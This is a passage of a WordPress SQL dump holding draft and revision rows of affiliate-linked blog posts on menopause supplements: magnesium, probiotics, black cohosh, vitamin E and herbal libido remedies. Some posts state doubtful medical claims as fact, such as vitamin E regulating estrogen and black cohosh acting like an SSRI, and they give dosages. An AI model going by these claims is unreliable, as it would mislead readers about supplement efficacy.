\n','A Comprehensive Guide to Digestive Problems During Menopause','','inherit','closed','closed','','5489-revision-v1','','','2023-09-12 14:07:57','2023-09-12 14:07:57','',5489,'https://tummyrevolution.com/?p=5494',0,'revision','',0),(5493,3,'2023-09-12 14:06:26','2023-09-12 14:06:26','\n

Menopause is a natural phase in a woman\'s life, marking the end of her reproductive years. While it brings about a multitude of physical and hormonal changes, many women may not be aware that these changes can also impact their digestive system. Digestive problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall well-being.

\n\n\n\n

The Menopausal Digestive Connection

\n\n\n\n

As women approach menopause, hormonal fluctuations, particularly a decline in estrogen and progesterone levels, can influence various bodily functions, including digestion. These hormonal changes can affect the functioning of the gastrointestinal tract, leading to a range of digestive issues. Common digestive problems during menopause include:

\n\n\n\n
    \n
  1. Gastroesophageal Reflux Disease (GERD): The decrease in estrogen levels can lead to a weakening of the muscles that control the opening between the esophagus and stomach, resulting in acid reflux and heartburn.
  2. \n\n\n\n
  3. Bloating and Gas: Hormonal changes can slow down digestion, causing food to linger in the digestive tract longer than usual. This can lead to increased gas production and bloating.
  4. \n\n\n\n
  5. Constipation: Reduced estrogen levels can impact bowel movements by affecting muscle contractions in the intestines. This can result in constipation and discomfort.
  6. \n
\n\n\n\n

4.Irritable Bowel Syndrome (IBS): Menopause can exacerbate symptoms of IBS, including abdominal pain, diarrhea, and constipation, due to the hormonal changes\' impact on gut sensitivity.

\n\n\n\n

5. Changes in Appetite: Fluctuating hormones can lead to changes in appetite, potentially causing overeating or loss of interest in food.

\n\n\n\n

Managing Digestive Problems

\n\n\n\n

The good news is that there are several effective strategies for managing digestive problems during menopause. It\'s important to consult a healthcare professional before making any significant changes, as individual needs may vary. Here are some approaches to consider:

\n\n\n\n

Dietary Modifications:

\n\n\n\n
    \n
  1. Increase fiber intake: A high-fiber diet can help alleviate constipation and promote regular bowel movements.
  2. \n\n\n\n
  3. Avoid trigger foods: Spicy, acidic, and fatty foods can worsen acid reflux and heartburn. Limiting these foods can provide relief.
  4. \n\n\n\n
  5. Stay hydrated: Drinking plenty of water supports healthy digestion and prevents constipation.
  6. \n\n\n\n
  7. Probiotics: Incorporating probiotic-rich foods or supplements can help maintain gut health and ease symptoms of bloating and gas.
  8. \n\n\n\n
  9. Lifestyle Changes:
  10. \n\n\n\n
  11. Maintain a healthy weight: Excess weight can contribute to digestive issues. Regular exercise and a balanced diet can aid in weight management.
  12. \n\n\n\n
  13. Eat smaller, frequent meals: Opting for smaller meals throughout the day can help prevent overloading the digestive system.
  14. \n\n\n\n
  15. Stress management: Practicing relaxation techniques such as yoga, meditation, or deep breathing can alleviate stress-related digestive problems.
  16. \n
\n\n\n\n

Medications and Supplements:

\n\n\n\n
    \n
  • Antacids: Over-the-counter antacids can provide temporary relief from heartburn and acid reflux symptoms.
  • \n\n\n\n
  • Laxatives: For occasional constipation, gentle laxatives may be recommended, but they should be used under medical supervision.
  • \n\n\n\n
  • Hormone therapy: In some cases, hormone replacement therapy (HRT) may be prescribed to manage menopausal symptoms, which could indirectly improve digestive issues.
  • \n\n\n\n
  • Regular Medical Check-ups:
  • \n\n\n\n
  •  Regular visits to a healthcare provider are essential to monitor and manage any emerging health concerns.
  • \n
\n\n\n\n

LINK TO SUPPLIMENTS

\n\n\n\n

Conclusion

\n\n\n\n

While digestive problems during menopause can be challenging, they are manageable with the right approach. By making dietary adjustments, adopting a healthy lifestyle, considering medications if necessary, and seeking guidance from healthcare professionals, women can navigate this transitional phase with greater comfort and improved digestive well-being. Remember, each woman\'s experience is unique, so it\'s important to tailor strategies to individual needs and preferences for the best results.

\n','A Comprehensive Guide to Digestive Problems During Menopause','','inherit','closed','closed','','5489-revision-v1','','','2023-09-12 14:06:26','2023-09-12 14:06:26','',5489,'https://tummyrevolution.com/?p=5493',0,'revision','',0),(5502,3,'2023-09-12 14:31:45','2023-09-12 14:31:45','','freestocks-nss2eRzQwgw-unsplash','','inherit','open','closed','','freestocks-nss2erzqwgw-unsplash','','','2023-09-12 14:31:45','2023-09-12 14:31:45','',5473,'http://tummyrevolution.com/wp-content/uploads/2023/09/freestocks-nss2eRzQwgw-unsplash.jpg',0,'attachment','image/jpeg',0),(5503,3,'2023-09-12 15:45:11','2023-09-12 15:45:11','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium

\n\n\n\n

Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.

\n\n\n\n

Link to product

\n\n\n\n

Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.

\n\n\n\n

Link to product
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.

\n\n\n\n

Link to product
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','draft','open','open','','why-magnesium-is-essential-during-the-menopause-choosing-the-right-supplement','','','2023-09-19 14:21:05','2023-09-19 14:21:05','',0,'https://tummyrevolution.com/?p=5503',0,'post','',0),(5504,3,'2023-09-12 15:44:39','2023-09-12 15:44:39','','mike-kenneally-d825JrXvun8-unsplash','','inherit','open','closed','','mike-kenneally-d825jrxvun8-unsplash','','','2023-09-12 15:44:39','2023-09-12 15:44:39','',5503,'http://tummyrevolution.com/wp-content/uploads/2023/09/mike-kenneally-d825JrXvun8-unsplash.jpg',0,'attachment','image/jpeg',0),(5505,3,'2023-09-12 15:45:11','2023-09-12 15:45:11','\n

Menopause is a natural phase in a woman\'s life, signaling the end of her reproductive years. While it\'s a normal process, it can bring about a range of uncomfortable symptoms, including hot flashes, mood swings, and sleep disturbances. Many women turn to supplements to manage these symptoms, and one such supplement gaining popularity is magnesium. But with various forms of magnesium available, which one is best for menopause? In this blog, we\'ll explore the different types of magnesium and help you make an informed decision.

\n\n\n\n

Why Magnesium?
Magnesium is an essential mineral that plays a crucial role in hundreds of bodily functions, including muscle and nerve function, bone health, and heart rhythm maintenance. It\'s also believed to be beneficial for managing some menopausal symptoms.

\n\n\n\n

Types of Magnesium
Magnesium Oxide: This form is the least expensive but has low bioavailability, meaning your body absorbs less of it. It\'s often used as a laxative and may not be the best choice for menopausal symptoms.
Magnesium Citrate: This is a common form of magnesium found in supplements. It\'s well-absorbed and can help with muscle cramps and constipation. However, it may not be the most effective for menopause symptoms.
Magnesium Glycinate: This is a highly bioavailable form of magnesium, which means it\'s easily absorbed by the body. It\'s often recommended for menopausal women because of its calming effect on the nervous system, potentially aiding in mood swings and sleep disturbances.
Magnesium Malate: This form of magnesium is bound to malic acid and may be beneficial for those experiencing fatigue and muscle pain during menopause.
Magnesium L-threonate: This type of magnesium has gained attention for its potential cognitive benefits and may be helpful for menopausal women experiencing brain fog or memory issues.

\n\n\n\n

Choosing the Best Magnesium for Menopause

\n\n\n\n

It\'s important to note that a balanced diet rich in magnesium-rich foods like leafy greens, nuts, and seeds is essential. Supplements should complement your diet rather than replace it.

\n\n\n\n

Conclusion

\n\n\n\n

Magnesium can be a valuable addition to your menopause management strategy, offering relief from common symptoms like hot flashes, mood swings, and sleep disturbances. When choosing a magnesium supplement, consider your specific symptoms and consult with a healthcare provider for personalized guidance. By making an informed choice, you can improve your overall well-being during this natural phase of life

\n','Why Magnesium is Essential During the Menopause: Choosing the Right Supplement','','inherit','closed','closed','','5503-revision-v1','','','2023-09-12 15:45:11','2023-09-12 15:45:11','',5503,'https://tummyrevolution.com/?p=5505',0,'revision','',0),(5496,3,'2023-09-12 14:09:43','2023-09-12 14:09:43','\n

Menopause is a natural and inevitable phase in a woman\'s life, marking the end of her reproductive years. While it brings relief from monthly periods and pregnancy worries, it also ushers in a host of physical and hormonal changes. One common issue that many women face during menopause is urinary problems. These can range from increased frequency and urgency to urinary incontinence. Fortunately, there are supplements available that can help manage these issues and improve your overall quality of life during this stage. In this blog, we will explore some of the supplements that can be beneficial for managing urinary problems during menopause.

\n\n\n\n

Cranberry Extract

\n\n\n\n

Cranberry extract has long been known for its potential to support urinary tract health. It contains compounds like proanthocyanidins, which may help prevent urinary tract infections (UTIs) and reduce the risk of recurrent infections. During menopause, women may be more susceptible to UTIs due to hormonal changes, so incorporating cranberry extract into your routine can be a wise choice. You can find cranberry supplements in various forms, including capsules and juice extracts.

\n\n\n\n

D-Mannose

\n\n\n\n

D-mannose is a natural sugar that has gained popularity for its ability to prevent and treat UTIs. It works by preventing bacteria, particularly E. coli, from adhering to the urinary tract lining, allowing your body to flush them out more easily. While D-mannose supplements are not a cure for urinary problems, they can be a helpful addition to your menopause management strategy.

\n\n\n\n

Probiotics

\n\n\n\n

Probiotics are beneficial bacteria that promote a healthy gut microbiome, and they may also play a role in supporting urinary health. Some research suggests that certain probiotic strains can help reduce the risk of UTIs and improve overall urinary function. As hormonal changes during menopause can disrupt the balance of bacteria in your body, probiotics may help restore equilibrium.

\n\n\n\n

Pumpkin Seed Extract

\n\n\n\n

Pumpkin seed extract is rich in antioxidants, vitamins, and minerals that can benefit your urinary system. It has been studied for its potential to alleviate symptoms of an overactive bladder and improve bladder function. Some women find relief from urinary urgency and frequency by incorporating pumpkin seed extract into their daily regimen.

\n\n\n\n

Soy Isoflavones

\n\n\n\n

Soy isoflavones are compounds found in soybeans that mimic the effects of estrogen in the body. During menopause, when estrogen levels drop, some women experience urinary problems due to changes in the bladder and urethra. Soy isoflavone supplements may help alleviate these symptoms by providing a mild estrogen-like effect. However, it\'s essential to consult with a healthcare professional before starting any new supplement, especially if you have a history of estrogen-sensitive conditions.

\n\n\n\n

Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fish oil supplements, have anti-inflammatory properties that can benefit overall health, including urinary health. Inflammation can contribute to urinary problems, so incorporating omega-3 supplements into your diet may help reduce inflammation and improve bladder function.

\n\n\n\n

Conclusion

\n\n\n\n

Menopause is a significant life transition for women, and it often comes with various challenges, including urinary issues. While supplements can be a helpful part of your strategy for managing these problems, it\'s crucial to remember that they are not a substitute for a healthy lifestyle, including a balanced diet, regular exercise, and good hydration habits.

\n\n\n\n

Before adding any new supplement to your routine, it\'s essential to consult with a healthcare professional. They can help you determine the right supplements for your specific needs and ensure that they won\'t interact negatively with any medications you may be taking. With the right approach and guidance, you can effectively manage urinary issues during menopause and maintain your overall well-being.

\n','Supplements for Managing Urinary Issues during Menopause','','inherit','closed','closed','','5486-revision-v1','','','2023-09-12 14:09:43','2023-09-12 14:09:43','',5486,'https://tummyrevolution.com/?p=5496',0,'revision','',0),(5506,3,'2023-09-13 05:39:32','2023-09-13 05:39:32','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n\n\n\n\n

\"\"

\n\n\n

\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

\n\n\n\n

2.Vitamin E

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n

How it works

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

\n\n\n\n

Recommended Product

\n\n\n

\"\"

\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n

How it work

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

\n','Three Best Supplements for Hot Flashes During Menopause','','draft','open','open','','three-best-supplements-for-hot-flashes-during-menopause','','','2023-09-19 13:49:01','2023-09-19 13:49:01','',0,'https://tummyrevolution.com/?p=5506',0,'post','',0),(5507,3,'2023-09-13 05:39:00','2023-09-13 05:39:00','','christina-deravedisian-B9WSHFkjlb8-unsplash','','inherit','open','closed','','christina-deravedisian-b9wshfkjlb8-unsplash','','','2023-09-13 05:39:00','2023-09-13 05:39:00','',5506,'http://tummyrevolution.com/wp-content/uploads/2023/09/christina-deravedisian-B9WSHFkjlb8-unsplash.jpg',0,'attachment','image/jpeg',0),(5508,3,'2023-09-13 05:39:32','2023-09-13 05:39:32','\n

Menopause is a natural transition in a woman\'s life, marking the end of her reproductive years. While this phase brings about various changes, one of the most common and uncomfortable symptoms is hot flashes. These sudden, intense sensations of heat can disrupt daily life and sleep patterns. While there\'s no magic cure for hot flashes, certain supplements have shown promise in helping to alleviate this symptom. In this blog post, we\'ll explore three of the best supplements for managing hot flashes during menopause.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

Black Cohosh is a herb native to North America and has been used for centuries to address menopausal symptoms, including hot flashes. Research suggests that Black Cohosh may help regulate hormone levels in the body, particularly estrogen, which can fluctuate dramatically during menopause.

\n\n\n\n

How it works:

\n\n\n\n

1.Black Cohosh may act as a natural selective serotonin reuptake inhibitor (SSRI), which can help stabilize mood and reduce the frequency and intensity of hot flashes. It may also have anti-inflammatory properties that help alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 20 to 40 milligrams per day in the form of capsules or tablets.

\n\n\n\n

Consult with a healthcare professional before starting any supplement regimen, as they can provide personalized recommendations based on your specific needs.

\n\n\n\n

2.Vitamin E

\n\n\n\n

Vitamin E is a powerful antioxidant that plays a crucial role in maintaining overall health. Some studies suggest that vitamin E supplementation can be effective in reducing the frequency and severity of hot flashes during menopause.

\n\n\n\n

How it works:

\n\n\n\n

Vitamin E helps regulate estrogen levels in the body, which can help mitigate hot flashes. Its antioxidant properties may also help protect cells and tissues from oxidative stress, potentially reducing the intensity of hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

The recommended daily intake of vitamin E for adults is around 15 milligrams (22.4 IU). However, consult with a healthcare provider before taking vitamin E supplements, as excessive intake can have adverse effects.

\n\n\n\n

3. Evening Primrose Oil

\n\n\n\n

Evening Primrose Oil is extracted from the seeds of the Evening Primrose plant and is rich in gamma-linolenic acid (GLA), an essential fatty acid. Some women find relief from menopausal symptoms, including hot flashes, when taking Evening Primrose Oil.

\n\n\n\n

How it works:

\n\n\n\n

GLA in Evening Primrose Oil may help regulate hormonal imbalances and reduce the intensity of hot flashes. The anti-inflammatory properties of GLA can also alleviate discomfort associated with hot flashes.

\n\n\n\n

Dosage:

\n\n\n\n

Typical doses range from 500 to 1,000 milligrams daily, divided into two or three doses.

\n\n\n\n

Consult with a healthcare professional to determine the right dosage for your specific needs.

\n\n\n\n

Conclusion

\n\n\n\n

While these supplements may offer relief from hot flashes during menopause, it\'s essential to remember that their effectiveness can vary from person to person. Additionally, individual factors, such as overall health and hormonal imbalances, may influence the outcomes. It\'s crucial to consult with a healthcare provider before adding any supplements to your routine, as they can provide personalized guidance and ensure they won\'t interact negatively with any other medications you may be taking. Combining supplements with a healthy lifestyle, including a balanced diet, regular exercise, and stress management, can help you navigate menopause with greater ease and comfort.

\n','Three Best Supplements for Hot Flashes During Menopause','','inherit','closed','closed','','5506-revision-v1','','','2023-09-13 05:39:32','2023-09-13 05:39:32','',5506,'https://tummyrevolution.com/?p=5508',0,'revision','',0),(5509,3,'2023-09-13 05:52:59','2023-09-13 05:52:59','\n

Low sex drive, also known as low libido, is a common concern for many women during menopause. Hormonal changes, physical symptoms, and emotional factors can all contribute to decreased sexual desire. Some women turn to herbal remedies to help address this issue. 

\n\n\n\n

Here are a few herbs that have been studied in relation to low libido during menopause:

\n\n\n\n

1.Black Cohosh (Actaea racemosa):

\n\n\n\n

Black cohosh is one of the most widely studied herbal remedies for menopausal symptoms, including low libido.

\n\n\n\n

Some studies suggest that black cohosh may help alleviate hot flashes and mood swings, which could indirectly improve libido.

\n\n\n\n

2.Maca (Lepidium meyenii):

\n\n\n\n

Maca root is a traditional herbal remedy from Peru and is often used to enhance libido and sexual function.

\n\n\n\n

Some studies suggest that maca may help improve sexual desire, especially in individuals with low libido.

\n\n\n\n

3.Ginseng (Panax ginseng):

\n\n\n\n

Ginseng is known for its adaptogenic properties and potential to improve energy and mood.

\n\n\n\n

Some studies have explored the use of ginseng for menopausal symptoms, including low libido, with mixed results.

\n\n\n\n

Conclusion

\n\n\n\n

While herbal remedies may be an option for some women, other approaches to improving libido during menopause include lifestyle changes, such as regular exercise, stress reduction, and maintaining a healthy diet. Hormone therapy and counseling or therapy may also be considered in consultation with a healthcare provider for women experiencing significant sexual concerns during menopause.

\n','Three Natural Ways to Boost Your Sex Drive During Menopause with Herbal Remedies','','draft','open','open','','three-natural-ways-to-boost-your-sex-drive-during-menopause-with-herbal-remedies','','','2023-09-14 06:16:01','2023-09-14 06:16:01','',0,'https://tummyrevolution.com/?p=5509',0,'post','',0),(5510,3,'2023-09-13 05:52:32','2023-09-13 05:52:32','','khadeeja-yasser-FHT0KEOwtyg-unsplash','','inherit','open','closed','','khadeeja-yasser-fht0keowtyg-unsplash','','','2023-09-13 05:52:32','2023-09-13 05:52:32','',5509,'http://tummyrevolution.com/wp-content/uploads/2023/09/khadeeja-yasser-FHT0KEOwtyg-unsplash.jpg',0,'attachment','image/jpeg',0),(5511,3,'2023-09-13 05:52:59','2023-09-13 05:52:59','\n

Low sex drive, also known as low libido, is a common concern for many women during menopause. Hormonal changes, physical symptoms, and emotional factors can all contribute to decreased sexual desire. Some women turn to herbal remedies to help address this issue. 

\n\n\n\n

Here are a few herbs that have been studied in relation to low libido during menopause:

\n\n\n\n

1.Black Cohosh (Actaea racemosa):

\n\n\n\n

Black cohosh is one of the most widely studied herbal remedies for menopausal symptoms, including low libido.

\n\n\n\n

Some studies suggest that black cohosh may help alleviate hot flashes and mood swings, which could indirectly improve libido.

\n\n\n\n

2.Maca (Lepidium meyenii):

\n\n\n\n

Maca root is a traditional herbal remedy from Peru and is often used to enhance libido and sexual function.

\n\n\n\n

Some studies suggest that maca may help improve sexual desire, especially in individuals with low libido.

\n\n\n\n

3.Ginseng (Panax ginseng):

\n\n\n\n

Ginseng is known for its adaptogenic properties and potential to improve energy and mood.

\n\n\n\n

Some studies have explored the use of ginseng for menopausal symptoms, including low libido, with mixed results.

\n\n\n\n

Conclution

\n\n\n\n

While herbal remedies may be an option for some women, other approaches to improving libido during menopause include lifestyle changes, such as regular exercise, stress reduction, and maintaining a healthy diet. Hormone therapy and counseling or therapy may also be considered in consultation with a healthcare provider for women experiencing significant sexual concerns during menopause.

\n','Three Natural Ways to Boost Your Sex Drive During Menopause with Herbal Remedies','','inherit','closed','closed','','5509-revision-v1','','','2023-09-13 05:52:59','2023-09-13 05:52:59','',5509,'https://tummyrevolution.com/?p=5511',0,'revision','',0),(5512,3,'2023-09-13 05:54:23','2023-09-13 05:54:23','\n

Low sex drive, also known as low libido, is a common concern for many women during menopause. Hormonal changes, physical symptoms, and emotional factors can all contribute to decreased sexual desire. Some women turn to herbal remedies to help address this issue. 

\n\n\n\n

Here are a few herbs that have been studied in relation to low libido during menopause:

\n\n\n\n

1.Black Cohosh (Actaea racemosa):

\n\n\n\n

Black cohosh is one of the most widely studied herbal remedies for menopausal symptoms, including low libido.

\n\n\n\n

Some studies suggest that black cohosh may help alleviate hot flashes and mood swings, which could indirectly improve libido.

\n\n\n\n

2.Maca (Lepidium meyenii):

\n\n\n\n

Maca root is a traditional herbal remedy from Peru and is often used to enhance libido and sexual function.

\n\n\n\n

Some studies suggest that maca may help improve sexual desire, especially in individuals with low libido.

\n\n\n\n

3.Ginseng (Panax ginseng):

\n\n\n\n

Ginseng is known for its adaptogenic properties and potential to improve energy and mood.

\n\n\n\n

Some studies have explored the use of ginseng for menopausal symptoms, including low libido, with mixed results.

\n\n\n\n

Conclusion

\n\n\n\n

While herbal remedies may be an option for some women, other approaches to improving libido during menopause include lifestyle changes, such as regular exercise, stress reduction, and maintaining a healthy diet. Hormone therapy and counseling or therapy may also be considered in consultation with a healthcare provider for women experiencing significant sexual concerns during menopause.

\n','Three Natural Ways to Boost Your Sex Drive During Menopause with Herbal Remedies','','inherit','closed','closed','','5509-revision-v1','','','2023-09-13 05:54:23','2023-09-13 05:54:23','',5509,'https://tummyrevolution.com/?p=5512',0,'revision','',0),(5513,3,'2023-09-13 06:04:00','2023-09-13 06:04:00','\n

Menopause is a significant milestone in a woman\'s life, marked by the cessation of menstruation and hormonal changes. While menopause brings about various changes in the body, including hot flashes and mood swings, it also has an impact on gut health. Many post-menopausal women may experience digestive issues, such as bloating, constipation, and a weakened immune system. Probiotics can be a valuable addition to the diet of post-menopausal women, offering numerous benefits for gut health and overall well-being. In this blog post, we will explore the best probiotics for post-menopausal women and how they can help maintain a healthy digestive system.

\n\n\n\n

Understanding Probiotics
Before delving into the best probiotics for post-menopausal women, it\'s important to understand what probiotics are. Probiotics are live microorganisms, usually bacteria or yeast, that are beneficial for your health, especially your digestive system. They are often referred to as \"good\" or \"friendly\" bacteria because they help maintain a balanced gut microbiome, which is essential for digestion and overall health.

\n\n\n\n

The Impact of Menopause on Gut Health
Menopause can bring about hormonal changes that affect the composition of the gut microbiome. These changes can lead to an imbalance in the gut bacteria, potentially causing digestive issues and compromising the immune system. Common gastrointestinal problems that post-menopausal women may experience include:
Constipation
Bloating
Diarrhea
Gut inflammation
Weakened immune system
Choosing the Right Probiotics

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

BEST PROBIOTICS FOR POST-MENOPAUSAL WOMAN
Here are some of the best probiotics for post-menopausal women:

\n\n\n\n

Lactobacillus Acidophilus: This strain is known for its ability to support digestive health and alleviate symptoms like bloating and constipation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Bifidobacterium Lactis: Bifidobacterium lactis may help boost the immune system and improve overall gut health.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain can help with diarrhea and may also have mood-boosting effects.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Plantarum: It is known for its anti-inflammatory properties and may help reduce gut inflammation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This yeast-based probiotic can help with diarrhea and gut infections.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary:

\n\n\n\n

Maintaining gut health is crucial for post-menopausal women to minimize digestive issues and support overall well-being. Probiotics offer a natural and effective way to achieve this. By selecting the right probiotic strains and consulting with a healthcare provider, post-menopausal women can optimize their gut health and enjoy the benefits of a balanced microbiome. Remember that consistency is key when taking probiotics, and it may take some time to see noticeable improvements in gut health.

\n\n\n\n

\n','Best Probiotics for Post-Menopausal Women: A Guide to Gut Health','','publish','open','open','','best-probiotics-for-post-menopausal-women-a-guide-to-gut-health','','','2023-10-10 14:23:47','2023-10-10 14:23:47','',0,'https://tummyrevolution.com/?p=5513',0,'post','',0),(5514,3,'2023-09-13 06:02:25','2023-09-13 06:02:25','','jamie-street-vcn2ndJ5LwE-unsplash','','inherit','open','closed','','jamie-street-vcn2ndj5lwe-unsplash','','','2023-09-13 06:02:25','2023-09-13 06:02:25','',5513,'http://tummyrevolution.com/wp-content/uploads/2023/09/jamie-street-vcn2ndJ5LwE-unsplash.jpg',0,'attachment','image/jpeg',0),(5515,3,'2023-09-13 06:04:00','2023-09-13 06:04:00','\n

Menopause is a significant milestone in a woman\'s life, marked by the cessation of menstruation and hormonal changes. While menopause brings about various changes in the body, including hot flashes and mood swings, it also has an impact on gut health. Many post-menopausal women may experience digestive issues, such as bloating, constipation, and a weakened immune system. Probiotics can be a valuable addition to the diet of post-menopausal women, offering numerous benefits for gut health and overall well-being. In this blog post, we will explore the best probiotics for post-menopausal women and how they can help maintain a healthy digestive system.

\n\n\n\n

Understanding Probiotics

\n\n\n\n

Before delving into the best probiotics for post-menopausal women, it\'s important to understand what probiotics are. Probiotics are live microorganisms, usually bacteria or yeast, that are beneficial for your health, especially your digestive system. They are often referred to as \"good\" or \"friendly\" bacteria because they help maintain a balanced gut microbiome, which is essential for digestion and overall health.

\n\n\n\n

The Impact of Menopause on Gut Health

\n\n\n\n

Menopause can bring about hormonal changes that affect the composition of the gut microbiome. These changes can lead to an imbalance in the gut bacteria, potentially causing digestive issues and compromising the immune system. Common gastrointestinal problems that post-menopausal women may experience include:

\n\n\n\n

Constipation
Bloating
Diarrhea
Gut inflammation
Weakened immune system
Choosing the Right Probiotics

\n\n\n\n

Best Probiotics for Post-Menopausal Women
Here are some of the best probiotics for post-menopausal women:

\n\n\n\n

Lactobacillus acidophilus: This strain is known for its ability to support digestive health and alleviate symptoms like bloating and constipation.

\n\n\n\n

Bifidobacterium lactis: Bifidobacterium lactis may help boost the immune system and improve overall gut health.

\n\n\n\n

Lactobacillus rhamnosus: This strain can help with diarrhea and may also have mood-boosting effects.

\n\n\n\n

Lactobacillus plantarum: It is known for its anti-inflammatory properties and may help reduce gut inflammation.

\n\n\n\n

Saccharomyces boulardii: This yeast-based probiotic can help with diarrhea and gut infections.

\n\n\n\n

Summary:

\n\n\n\n

Maintaining gut health is crucial for post-menopausal women to minimize digestive issues and support overall well-being. Probiotics offer a natural and effective way to achieve this. By selecting the right probiotic strains and consulting with a healthcare provider, post-menopausal women can optimize their gut health and enjoy the benefits of a balanced microbiome. Remember that consistency is key when taking probiotics, and it may take some time to see noticeable improvements in gut health.

\n\n\n\n

\n','Best Probiotics for Post-Menopausal Women: A Guide to Gut Health','','inherit','closed','closed','','5513-revision-v1','','','2023-09-13 06:04:00','2023-09-13 06:04:00','',5513,'https://tummyrevolution.com/?p=5515',0,'revision','',0),(5516,3,'2023-09-13 08:00:50','2023-09-13 08:00:50','\n

